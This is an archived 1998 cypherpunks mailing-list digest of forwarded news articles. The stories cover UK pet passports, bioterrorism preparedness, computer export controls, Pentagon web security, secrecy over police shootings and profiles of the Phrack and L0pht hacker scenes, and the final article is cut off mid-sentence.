Date: Sat, 19 Sep 1998 21:56:09 +0800
To: cypherpunks@cyberpass.net
Subject: IP: UK: Microchips & Animal Passports for Pets
Message-ID: <199809200246.TAA11989@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: UK: Microchips & Animal Passports for Pets
Date: Sat, 19 Sep 1998 06:40:49 -0500
To: believer@telepath.com

Source:  London Telegraph
http://www.telegraph.co.uk:80/et?ac=000150689433551&rtmo=gYkgwZZu&atmo=99999
999&P4_FOLLOW_ON=/98/9/19/npets19.html&pg=/et/98/9/19/npets19.html

UK News 
Electronic Telegraph 
Saturday 19 September 1998
Issue 1212

Passports for pets in new rabies law
By David Brown, Agriculture Editor 

BRITAIN'S stringent anti-rabies quarantine laws are to be swept aside in
favour of electronic scanners and animal passports under plans to be
published by the Government next week.

A scheme relying on microchip implants that can be electronically
monitored, together with documentary proof that animals have been immunised
against rabies and other diseases, are among a raft of proposals that could
mean the demise of mandatory six-months quarantine for all imported animals.

Under the proposals, animals travelling between designated "low disease
risk" countries in Europe and elsewhere would be allowed entry on condition
that they were carefully screened on arrival and possibly subjected to
blood tests. The Government is likely to back the proposals for a radical
overhaul of the increasingly controversial quarantine system, which has
been Britain's main front-line defence against rabies for nearly a century. 

Currently, imported pets must be held in nominated kennels for six months
until vets decide they pose no health risk to people or animals in this
country. Diplomats and members of the Armed Forces will be among those who
should find life easier - if their overseas posts meet new criteria for
assessing potential risks and
their animals are properly vaccinated and provided with proposed new
movement documents.

But quarantine will not disappear completely under the plans drawn up over
the past 10 months by a team of independent government advisers headed by
Prof Ian Kennedy of University College, London. It will remain as a safety
net to screen animals imported from countries that still have a problem
with rabies - including many
in Eastern Europe, North and South America, Africa and the Far East. "It
will not be the free-for-all that some people might expect," Whitehall
sources said last night.

Nick Brown, the Minister of Agriculture, is expected to call a press
conference next Wednesday to publish the report. But before the Government
acts, the plans will be circulated for consultation among vets, animal
welfare organisations, including the Royal Society for the Prevention of
Cruelty to Animals, dog and cat breed societies,
farmers and other groups with an interest in animal health.

Britain's last major rabies scare was in 1969. In 1983, an Irish Wolfhound
imported from the United States was caught with rabies in a quarantine
kennel and in June 1996, at the height of the BSE crisis, a rabid bat that
is believed to have crossed the Channel, bit a pregnant woman in Newhaven,
Sussex. 

The Government decided in October last year to review the current
quarantine arrangements after coming under mounting pressure from animal
welfare groups and pet owners, including Chris Patten, Britain's last
Governor of Hong Kong, who complained about difficulties in returning his
family's pet dogs to Britain.

Those complaints, coupled with the decline of rabies in EU countries, have
given added impetus for the reform of the system over the past two years.
But many vets remain to be convinced that easing quarantine is a good idea,
arguing that veterinary certificates issued abroad may not be valid.

The British Veterinary Association said last night: "We have not seen a
copy of this report but our position is clear. We will not agree to any
changes which do not, in our view, provide the United Kingdom with at least
the level of safeguards against disease that the present quarantine system
provides."

(c) Copyright Telegraph Group Limited 1998.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:45:41 +0800
To: cypherpunks@cyberpass.net
Subject: IP: "Bioarmageddon"
Message-ID: <199809200246.TAA12000@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: "Bioarmageddon"
Date: Sat, 19 Sep 1998 06:56:14 -0500
To: believer@telepath.com

Source:  New Scientist
http://www.newscientist.com/nsplus/insight/bioterrorism/bioarmageddon.html

Bioterrorism Special Report: 

Bioarmageddon 
By Debora MacKenzie 

Sooner or later there is going to be a biological attack on a major city.
Are we prepared to deal with it? Not a chance, says Debora MacKenzie 

It begins with a threat. A terrorist group declares that unless its demands
are met within 48 hours, it will release anthrax over San Francisco. Two
days later, a private plane flies across the Bay, spreading an aerosol
cloud that shimmers briefly in the sunlight before disappearing. 

Scenario one: thousands are killed in the panic as 2 million people flee
the city. Another 16 million inhale anthrax spores. Antibiotics are rushed
in, but the hospitals are overwhelmed and not everyone receives
treatment. Most of the country's limited stock of anthrax vaccine has
already been given to soldiers.
Emergency crews provide little help as there are only four germ-proof suits
in the whole city. More than a
million of the Bay Area's 6.5 million residents die.  

Scenario two: in the two days before the attack, citizens seal their doors
and windows with germ-proof tape. They listen to the radio for
instructions, their gas masks, drugs and disinfectants ready. Few panic.
When sensors around the city confirm that the cloud contains anthrax
spores, hospitals receive the appropriate antibiotics and vaccines. Trained
emergency teams with germ-proof suits and tents set up in the places where
automated weather analyses show the deadly cloud will drift. With advance
preparation and rapid response only 100,000 people die. 

A terrorist who plans to drop anthrax over San Francisco tomorrow can count
on causing the murder and mayhem described in the first scenario--at least
according to the simulation that generated these scenarios last year. The
question facing policy makers now is: how do we move toward the second
scenario? 

That terrorists may someday turn to biological weapons is no longer a
matter of debate (see "All fall down",
New Scientist, 11 May 1996, p 32). "Terrorism has changed," says Brad
Roberts of the US government-backed Institute for Defense Analyses in
Virginia. "Traditional terrorists wanted political concessions," he says.
"But now, some groups say their main aim is mass casualties. That makes
biological weapons appealing." 

Terrorists would have little trouble getting their hands on the technology.
Hearings in South Africa in June
revealed that the apartheid government produced terrorist weapons
containing anthrax, Salmonella and cholera. Soviet scientists who have
prepared weapons-grade anthrax and smallpox are known to have emigrated,
possibly to well-funded terrorist groups like the one run by Osama bin
Laden in Afghanistan.
Even small groups such as the Aum Shinrikyo sect in Japan have been able to
cook up vats of Salmonella or
botulin, the toxin that causes botulism.  

With bioweapons so readily available, how can governments protect us from a
terrorist armed with anthrax, smallpox or plague? In May, scientists,
policy makers and security experts gathered in Stockholm to discuss how to
limit the devastation of a biological attack on civilians. Until now, most
biological defence strategies have been geared to protecting soldiers on
the battlefield rather than ordinary people in cities. The situations are
quite different, and novel technologies are needed for civilian defence. 

Suppose a commuter stumbled across a time bomb filled with anthrax on an
underground railway platform.
Until this year, no police force in the world had any way to disarm such a
device safely. One novel solution that attracted attention at Stockholm was
a tent full of antiseptic foam. Researchers at Irvin Aerospace in Fort
Erie, Ontario, have developed a dome-shaped tent made of ultratough Mylar
that can be filled with a stiff foam--the exact composition of which is a
closely guarded secret--that kills germs and also neutralises chemical
weapons. Once covered by the foam-filled tent, the bomb can be safely
detonated. 

But what if germs are already in the air? The protective suits and masks
used by most emergency services don't have seals tight enough to exclude
microorganisms, making them useless against biological attacks, says Jack
Sawicki, a former fireman who now works for Geomet Technologies near
Washington DC. And the
lack of standards for gas masks sold to civilians in most countries makes
it as likely that a mask will suffocate
you as save you, he says. The suits developed for the military do
work--their tight joints and zippers keep
bugs out--but they are too pricey for the average fire department. 

Both Geomet and Irvin Aerospace are about to market civilian bio-suits. In
the meantime, other companies are
designing protective gear that actually kills pathogens. Molecular
Geodesics in Cambridge, Massachusetts, for
example, is developing a suit made of a tough, sponge-like polymer that
traps bacteria and viruses, which are then destroyed by disinfectants
incorporated into the fabric. 

Stealthy attack 

None of this gear will do any good, however, if the emergency services do
not know there has been an
attack. And an assault may not be obvious. A terrorist might not use a
weapon that goes off with a dramatic
bang, or even produces an obvious cloud of germs. The first hint of a
biological attack may be a sudden
cluster of sick people.  

Even that will be missed unless someone is watching. And few are. In the
US, financial cutbacks have
crippled programmes to track disease outbreaks, natural or deliberate. Some
could be either, such as
food poisoning caused by Escherichia coli O157 or Salmonella. Medical
agencies fear that the extra money
requested by President Bill Clinton this spring as part of an
anti-terrorist initiative will not be enough to create
an adequate surveillance network.  

In Europe, disease surveillance is only beginning to be organised on the
continent-wide scale needed to track a biological emergency. But in
addition to monitoring infected people, Nicholas Staritsyn of the State
Research Centre for Applied Microbiology near Moscow says that more effort
should be made to find
out which bugs live where. For example, a particular variety of anthrax may
occur naturally in South Africa,
but not in Canada. Having access to such information could help authorities
to distinguish between natural
outbreaks and deliberate attacks.  

Even when infected people start turning up at local hospitals, early
diagnosis of their illness might not be
easy, says Steve Morse, who heads the US programme on new diagnostic
technologies run by the Defense
Advanced Research Projects Agency (DARPA). The first symptoms of anthrax,
plague and many other
potential agents of bioterrorism resemble those of flu: headaches, fevers,
aching muscles, coughing. What's
more, some of these symptoms might be brought on by panic attacks, which
are likely to be widespread among people who have just been told that they
are the victims of a biological attack. 

One answer discussed in Stockholm would be for hospitals to have the type
of high-tech detectors being
developed to identify airborne pathogens on the battlefield. With a
detector at each bedside, doctors could pick out the volatile molecules
released by damaged lung membranes at a very early stage of infection and
instantly tell whether a patient was a victim of a biological attack, says
Mildred Donlon, head of environmental detection research at DARPA. 

Eventually, DARPA would like to develop a detector that weighs no more than
2 kilograms, can identify as few as two particles of 20 different
biological agents in a sample of air, costs less than $5000 and does not
give false negatives. Such detectors could be deployed around cities to
give early warning of airborne disease. 

In the meantime, researchers led by Wayne Bryden at Johns Hopkins
University in Baltimore are working on revamping the traditional laboratory
workhorse, the mass spectrometer, for use in the field or in hospitals.
They've reduced this unwieldy piece of equipment to a suitcase-sized
machine that can distinguish between,
say, Shigella, which causes dysentery, and Salmonella. A shoebox-sized
version, says Bryden, could be ready in five years. 

Other researchers are experimenting with devices that would not seem out of
place in an episode of Star Trek: Voyager. Tiny electronic chips that
contain living nerve cells may someday warn of the presence of bacterial
toxins, many of which are nerve poisons. Like a canary in a coal mine, the
neurons on the chip will chatter until something kills them. "Anything that
stops it singing is immediate cause for alarm," says Donlon. 

While the "canary on a chip" could detect a broad range of toxins, other
devices are designed to identify specific pathogens. One prototype consists
of a fibre-optic tube lined with antibodies coupled to light-emitting
molecules. In the presence of plague or anthrax bacteria, or the toxins
botulin or ricin, the molecules light up. 

Outwitting our defences 

Devices based on antibodies are far from foolproof. First, you need to have
the correct antibodies--not easy when you consider the vast number of
pathogens you'd need to include, and their ever-changing repertoire of
surface proteins. "And even the right antibodies can identify only what is
on the outside of a particle," Donlon points out. Bugs can be encapsulated
in gels or biological polymers to foil antibodies, or normally harmless
bacteria engineered to carry nasty genes. "I want to know what is on the
inside," she says. 

To do this, DARPA-funded researchers are developing identification
techniques based on RNA analysis. Unlike DNA, which is now used to identify
unknown organisms, RNA is plentiful inside cells and need not be amplified
before identification begins. And messenger RNA molecules reveal not only
what a microorganism
is, but what toxins it is making.   

Once the biological agent has been identified, how do you combat it?
Vaccinating people before they are exposed is one answer. This is the
strategy the military is betting on. Last year, the US military launched a
programme to develop vaccines against potential biological weapons. It will
create jabs for diseases for which none exist, such as Ebola, and improve
existing vaccines--including the 30-year-old anthrax vaccine being given to
24 million American soldiers. 

But vaccines are no cure-all. An attacker need only generate a germ that
sports different antigens to those used in a vaccine to render that vaccine
ineffective. Plus, as bioterrorists get more sophisticated, they will
develop novel, possibly artificial, pathogens against which conventional
vaccines will be useless, predicts Morse. 

To get around these problems, DARPA is looking at ways of developing
vaccines quickly enough for them to be created, mass-produced and
distributed after an attack. The first step, which many researchers
including those in the fast-paced field of genomics are now working on,
involves speeding up DNA sequencing so that an unknown pathogen's genes
could be detailed in a day. The resulting sequences could then be the basis
for developing an instant DNA vaccine. 

Making the vaccine is only half the problem, however. Soldiers can be
ordered to take shots, but immunising 
the rest of the population is another matter. Civilians are unlikely to
volunteer for the dozens of vaccinations that would be necessary to protect
them against every conceivable biological threat. An attack would make many
change their minds, but in such circumstances there might not be enough to
go around. Although Clinton has called for the stockpiling of vaccines, the
US has only 5 million doses of smallpox vaccine--not enough to contain a
hypothetical attack, says Ken Berry, president of the American Academy of
Emergency Physicians. 

Ken Alibek, the former second-in-command of the Soviet germ warfare
programme who revealed earlier this year that the Soviets had weaponised
tonnes of smallpox, argues that it is short-sighted to put too much effort
into developing vaccines. Instead, says Alibek, who is now at the Batelle
Institute in Virginia, researchers should concentrate on ways to treat
victims of biological weapons. Today's antibiotics may be useless because
germs could be equipped with genes for resistance to all of them. Russian
scientists have already created such a strain of anthrax (This Week, 28
February, p 4). 

For any treatment to be effective amid the potential chaos of a
bioterrorist attack, speed will be of the essence. At the Stockholm
meeting, researchers reported their efforts to develop drugs that work
against a wide variety of infections and so can be used even before
definitive diagnosis. Some are trying to take advantage of recently
identified similarities in the way many pathogens produce disease to
develop broad-spectrum drugs. 

For example, Ebola, anthrax and plague all kill their victims by inducing a
widespread inflammatory reaction similar to toxic shock syndrome. A team in
Cincinnati is testing an anti-inflammatory drug that could stop all of
them. Another gang of bacteria--including plague, Salmonella, Shigella and
Pseudomonas aeruginosa (one of the bacteria that can cause pneumonia and
meningitis)--relies on very similar proteins to latch onto human cells and
inject toxins. Drugs that block this system might save people from all
these germs, ke Forsberg of the Swedish Defence Research Establishment in
Ume told the meeting.  

The trouble with all these new anti-bioweapon gizmos, gadgets and medicines
is that it's far from certain that 
they would be available in time to shield the first major city targeted for
a bioterrorist attack. At the moment, the US is one of the few countries
taking the bioterrorist threat seriously. Sweden, France and Israel have
trained emergency teams and stockpiled gas masks. Other countries do not
seem concerned. "The threat of bioterrorism has not seized our European
friends," says Mike Moodie of the Chemical and Biological Arms Control
Institute, a think-tank near Washington DC. "They feel it's too improbable." 

Perhaps they should reconsider. Berry, who helped run the doomsday
simulations that ravaged San  Francisco, says: "Security experts are not
asking if a biological attack on a civilian population is going to happen,
but when." 

>From New Scientist, 19 September 1998 
(c) Copyright New Scientist, RBI Limited 1998
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:57:05 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Clinton Computer Exports Compromise Nat'l Security
Message-ID: <199809200246.TAA12011@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Clinton Computer Exports Compromise Nat'l Security
Date: Sat, 19 Sep 1998 07:40:35 -0500
To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/library/tech/98/09/biztech/articles/17computer-export
s.html

September 17, 1998

U.S. Agency Faults Study on Exports of Computers

By JEFF GERTH

WASHINGTON -- When the Clinton administration relaxed export controls on
high-performance computers in 1996, it relied on a flawed report that did
not study the national security implications and concluded with scant data
that the computers were already easily available around the world,
government auditors said Wednesday. 

The opposite conclusion is true, said the General Accounting Office, the
audit arm of Congress. In a report released to a Senate panel, the auditors
found that such high-performance computers "are not readily available" to
countries of national security concern to the United States, like China,
India or Pakistan. 

The GAO report also said that American manufacturers continue to dominate
the overseas market. An important administration argument for loosening
export controls was that easing controls was the only way
American computer makers could compete against widely available
foreign-made technology. 

The auditors said that "a key element" in the decision to relax the export
controls was a Stanford University study, commissioned by the Commerce and
Defense departments without any competition, that said some U.S. computer
technology was uncontrollable worldwide and efforts to control it would
harm the industry. 

 But the auditors said that the study "lacked empirical evidence or
analysis regarding its conclusion" of uncontrollability. The GAO also said
that the study failed to do one of its assigned tasks: study how countries
like China might use the computers for military purposes. 

Within a year after the export rules were loosened, military installations
in Russia and China obtained a few powerful new American computers,
prompting criminal investigations and a retightening by Congress of the
export controls.  

The study's authors responded to the GAO, and their responses were
presented to the Senate subcommittee on International Security,
Proliferation and Federal Services by Harold Johnson, the GAO's associate
director. 

Johnson said that the authors told the accounting office that they did not
do a national security threat analysis because the federal government does
not have the right information to do such a study. Seymour Goodman, the
study's principal author, disputed the GAO's criticism of his report's
analysis. "We had a lot of empirical evidence and we did a comprehensive
analysis that was different from theirs and that focused on the
availability of U.S.-built systems." 

William Reinsch, the undersecretary of commerce for export administration,
defended the administration's relaxation of controls and said the GAO had
asked the wrong question in looking at the computer marketplace. 

"Even though the U.S. today dominates the market for high-performance
computers, there is a performance threshold below which we can not
realistically expect to maintain control of computers unless we restrict
sales to our closest allies," he said. 

Reinsch went on to argue that the GAO was wrong to rank national security
as the top priority for looking at this issue. Instead, he said, the first
priority should be the realities of the marketplace, where high-performance
computers "are becoming less and less controllable because they are
becoming smaller, cheaper, more powerful and more reliable, requiring less
vendor support." 

President Clinton announced the change in policy in late 1995, fulfilling a
pledge he made early in his administration to computer executives. The move
also helped countries like China, which could now buy more
advanced American computers without any federal license as long as the
technology was used for civilian purposes. 

But the new rules made the exporter responsible for deciding whether a
license was required, a decision previously made by the federal government.
This new responsibility, the GAO report said, was "particularly difficult"
for companies selling to countries like China, "where identifying the
distinction between a civilian and military end user can be difficult
without information that is sometimes available only to the U.S. government." 

Now, the Clinton administration is weighing whether to further relax the
computer export limits. But the administration's critics remain "concerned
that the policy is flawed," said Sen. Thad Cochran, R-Miss., who led
Wednesday's hearing.  

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:45:10 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Pentagon curbs Web content
Message-ID: <199809200246.TAA12023@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Pentagon curbs Web content
Date: Sat, 19 Sep 1998 07:43:45 -0500
To: believer@telepath.com

Source:  ComputerWorld
http://www.computerworld.com/home/news.nsf/all/98091838dod

 (Online News, 09/18/98 01:07 PM)

Pentagon curbs Web content
By Sharon Machlis

 Top Pentagon officials are scouring military Web sites to see if too much
information is being made public -- data that could potentially help the
country's enemies. 

 Some observers fear that listing members of specific military units could
help terrorists find revenge targets, for example, particularly after an
operation such as the recent missile strikes in Afghanistan and the Sudan. 

 "Basically, the military does stupid things," said Ira Winkler, a former
analyst at the National Security Agency and author of the books Corporate
Espionage and Through the Eyes of the Enemy. 

 "The military does not exercise good operational security when it comes to
their Web sites ... There's no valid reason for a military unit to have a
Web site," Winkler said. 

 Deputy Defense Secretary John Hamre and the military's Joint Staff have
been checking for Web postings such as building plans, research and
development efforts and "personnel information that could perhaps provide
too much information," said Defense Department spokesman Kenneth Bacon, in
a statement. 

 A more formal, militarywide policy on what should and shouldn't be put on
the Web is in the works, added department spokesman Susan Hansen. 

 Winkler said it is ill-advised to post things such as personnel lists or
commanders' biographies -- which often include family information -- on the
Web. He also recommended against companies posting similar information
about corporate officers. 

 In fact, some companies already restrict the data they post about
personnel and even product pricing -- although the concern is less about
terrorists and more about competitors. 

 "We're in the process now, as I believe many private companies are, of
trying to sort out what the right balance is between providing useful
information and providing more information than is necessary," Bacon said. 

 Copyright (c) 1998 Computerworld, Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:56:06 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Killed by Police? Keep it Secret
Message-ID: <199809200247.TAA12034@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Killed by Police? Keep it Secret
Date: Sat, 19 Sep 1998 10:12:07 -0500
To: believer@telepath.com

Source:  Rocky Mountain News
http://www.insidedenver.com/news/0919secr1.shtml

Secrecy pushed in killings
by police 

But critics say names of officers should always
be made public 

By Kevin Vaughan
Rocky Mountain News Staff Writer

A move is afoot in Colorado to keep the names of
police officers who shoot people secret.

A Greeley judge this week ruled that the public has no
right to know which officers shot and killed four
people over the past two years.

"That seems like sort of the ultimate double standard
to me, because I can shoot and kill someone in my
house in self-defense, and my name will be open as a
matter of public record," said Chris Cobler, managing
editor of the Greeley Tribune.

The paper had sued the Greeley Police Department,
the Weld County Sheriff's Department and the district
attorney's office to obtain the officers' names.

At least one legislator praised Weld District Judge
Jonathan Hays' Wednesday ruling.

"I am strongly opposed to releasing the names of
those officers that have not been found accountable,
or found guilty, in a shooting," said state Sen. Ken
Arnold, R-Westminster.

Arnold spent 28 years with the Colorado State Patrol
before becoming a lawmaker.

The State Patrol and most other Colorado police
agencies release the names of officers involved in
shootings -- some agencies immediately, others in
weeks or months.

But newspaper editors and the American Civil
Liberties Union worry that the disclosure practice may
soon end because of the ruling.

In Aurora, Police Chief Vern Saint Vincent has
refused to identify two officers who killed a gunman in
a domestic dispute a week ago, citing the same legal
provisions the Greeley judge used.

Saint Vincent said his decision is temporary, and he
plans to identify the officers after investigating threats
against them.

But he may change his mind. He said he expects his
officers to lobby for secrecy and that he'll consider it.

"There simply can't be a right to privacy for someone
with the full authority of a law enforcement officer
who has used deadly force against a citizen," said
Tom Kelley, an attorney for the Colorado Press
Association. "You could make the argument that
anyone accused of a crime has a right to privacy,
which I don't think anyone would take very seriously."

At issue is the interpretation of two state laws
governing the release of public records and
criminal-justice documents. The laws spell out what
the public has a right to see.

Hays ruled that police shootings are not "official
actions" as defined by the Criminal Justice Records
Act. As such, they fall under an area of the law that
allows police and sheriff's departments to withhold
information that is "contrary to the public interest."

Identifying the officers, Hays wrote, "plays no
significant, positive role in the functioning of the
criminal-justice process."

But one of the state's top cops doesn't see it that way.

"I just have this problem with the idea that that should
be a blanket policy," said Pat Ahlstrom, executive
director of the state Department of Public Safety.
"We don't see it that way. They're public officers, and
the act of using force and deadly force is subject to
public scrutiny."

The department oversees the State Patrol and the
Colorado Bureau of Investigation.

A check of other law enforcement agencies in the
Denver area found that all routinely release the names
of officers in shootings.

"There's really no reason for us not to release the
names," said Adams County sheriff's Sgt. Mike
Kercheval.

Different agencies have different rules about when the
names are released. For some, it comes within 24
hours of a shooting. Others wait longer.

Lakewood, for example, withholds the name of an
officer involved in a shooting until the investigation is
finished. 

"It is the same procedure that is afforded any citizen in
Lakewood that is investigated in a shooting," police
spokeswoman Lynn Kimbrough said. "For us, it is not
a matter of 'if.' It is simply a matter of 'when."'

Cobler said the Tribune has no plan to appeal this
week's ruling.

But others said they expect an effort to change it,
either through an appeal or by attempting to change
the laws to make them clearer.

"Let's change the statute," said Mark Silverstein, legal
director of the ACLU of Colorado.

Arnold, however, said he trusts police and
prosecutors to investigate shootings thoroughly.

September 19, 1998 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:56:41 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Hacker editor rides herd on unruly institution
Message-ID: <199809200247.TAA12045@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Hacker editor rides herd on unruly institution
Date: Sat, 19 Sep 1998 11:51:24 -0500
To: believer@telepath.com

Source:  Fox News - AP

Hacker editor rides herd on unruly institution
 11.01 a.m. ET (1502 GMT) September 19, 1998

 By Chris Allbritton, Associated Press

 SAN FRANCISCO (AP) - The lines of text scrolled off the screen quickly,
but the bleached-blond hacker snatched quick glances at the visitors' log
on his Web page. Lots of visitors using military and government computers.
The hacker, who calls himself Route, said he always gets a kick out of the
feds' visits. He smiled. 

 The FBI, the CIA and the others "wouldn't be doing their job if they
weren't tracking computer information both legitimate and illegitimate,''
Route said. "I guess Phrack falls somewhere in between.'' 

 Phrack is an online publication called a 'zine. It's a digital chimera:
written for hackers but read by law enforcement, too. It's been the subject
of federal prosecution, yet it still operates in the open. Its name
combines "hack'' and "phreak,'' which refers to phone hacking. 

 It's got attitude, technical know-how and in many ways defines today's
hacker scene. It first hit the electronic bulletin boards Nov. 17, 1985,
ages ago in hacker years. 

 To put its longevity in perspective, Phrack came out two years after the
movie "WarGames'' in which actor Matthew Broderick established the cliched
image of the hacker as the lonely kid who altered his grades with a
computer. Phrack predates the World Wide Web by almost a decade. And Phrack
is older than many of its readers, who number about 8,000, said Route, who
refuses to give his real name. 

 Route, 24, doesn't look like the scrawny computer nerd with the
cathode-ray pallor so many think of when the word hacker is mentioned.
Silver earrings dangle from each ear and a bar pierces his tongue. Spidery
tattoos creep down his shoulders and over biceps grown solid with hours of
iron work. 

 Behind his glower lies a keen mind that cuts through computer network
problems like a digital knife, an invaluable skill for his day job at a
computer security firm with Fortune 500 companies for clients. Route
refused to name his company. 

 Phrack's improbable history begins in 1985 when a hacker with the handle
Taran King cobbled together various subversive texts that had been
circulating like Soviet-era samizdat on the archipelago of underground
electronic bulletin boards. It included all sorts of mischief-making: "How
to Pick Master Locks,'' "How to Make an Acetylene Bomb'' and
"School/College Computer Dial-Ups.'' 

 But Phrack found itself the focus of federal prosecution in 1990, when
editor Craig Neidorf, a k a Knight Lightning, was prosecuted by the Chicago
Computer Fraud and Abuse Task Force. His alleged crime? He published a
document in Phrack with certain details of the emergency 911 systems in use
around the country. It had been given to him by another hacker who had
copied it from computers owned by BellSouth, which valued it at almost
$80,000. 

 But the task force wanted to prove the document was more than valuable.
Assistant U.S. Attorney William J. Cook said it put dangerous information
in the hands of hackers. 

 The case fell apart when Neidorf's lawyer proved that more detailed
information about the system had appeared in other publications. You could
order them from phone company technical catalogs for $13. The charges were
dropped. Neidorf's trial was over. 

 If today's Phrack is a bit less confrontational, that's understandable.
Like many of the older hackers, Route is shifting his focus away from
anarchy texts and phone hacking to computer security. Its "how-to'' days
are pretty much over. 

 "Phrack is not meant to be a manual of vulnerabilities,'' he said. 

 As the editor, Route knows that Phrack can still be used for illegal
purposes. "But you can't hold people completely liable for just putting
information out there.'' 

 He said he has had "blatantly illegal stuff'' sent to him. Once, he said
he received the technical specifications for most pager systems used in the
country, complete with how to hack those systems. He didn't publish. 

 "It's a judgment call,'' he said. "I have no intention of running up
against the law or (upsetting) the military.'' 

 But it's almost guaranteed that something gleaned from Phrack will be used
against the computer system of a big and powerful organization or business. 

 "The scene is going to do what the scene is going to do,'' he said. "It's
like any clique in society. You have good people and you have bad people.'' 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:44:54 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Hackers-turned-consultants see business boom
Message-ID: <199809200247.TAA12056@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Hackers-turned-consultants see business boom
Date: Sat, 19 Sep 1998 11:53:29 -0500
To: believer@telepath.com

Source:  Fox News - AP

On guard now, hackers-turned-consultants see business boom
 11.00 a.m. ET (1501 GMT) September 19, 1998

 By Chris Allbritton, Associated Press

 NEW YORK (AP) - The hacker calling himself Mudge pushed his long hair
back, scratched his beard and stared at the computer screen. He knew there
was something wrong with the data traffic he was watching, but what was it? 

 A week earlier, Mudge and his fellow hackers in their hangout known as the
L0pht - pronounced "loft'' - had acquired some software that was supposed
to let computers talk to each other in code. But as Mudge watched the data
he realized someone else was doing the same and maybe even decoding it,
which shouldn't happen. 

 "So you are saying that you're using DES to communicate between the
computers?'' Mudge recalled asking representatives of the software maker.
Yes, they said, they were using DES, a standard encryption method that for
years was considered virtually uncrackable. 

 But this wasn't DES, thought Mudge. It's almost as if... 

 Whoa. He blinked and felt the adrenaline kick in. This wasn't secure at
all. In fact, the encoding was only slightly more complex than the simple
cyphers kids did in grade school - where "A'' is set to 1, "B'' is set to
2, and so on. 

 The company was selling this software as a secure product, charging
customers up to $10,000. And yet, it had a security hole big enough to
waltz through. 

 Instead of exploiting this knowledge, Mudge confronted the company. 

 "You realize there isn't any secure or 'strong' encoding being used in
your communications between the computers, don't you?'' he asked. 

 "Well...'' 

 "And that you claimed you were using DES to encrypt the data,'' he pressed. 

 "That will go in the next revision.'' 

 Mudge is a "real'' hacker - one who used to snoop around the nation's
electronic infrastructure for the sheer love of knowing how it worked. His
kind today are sighted about as often as the timberwolf, and society has
attached to them the same level of legend. 

 Like the wolf, they were once considered a scourge. Law enforcement and
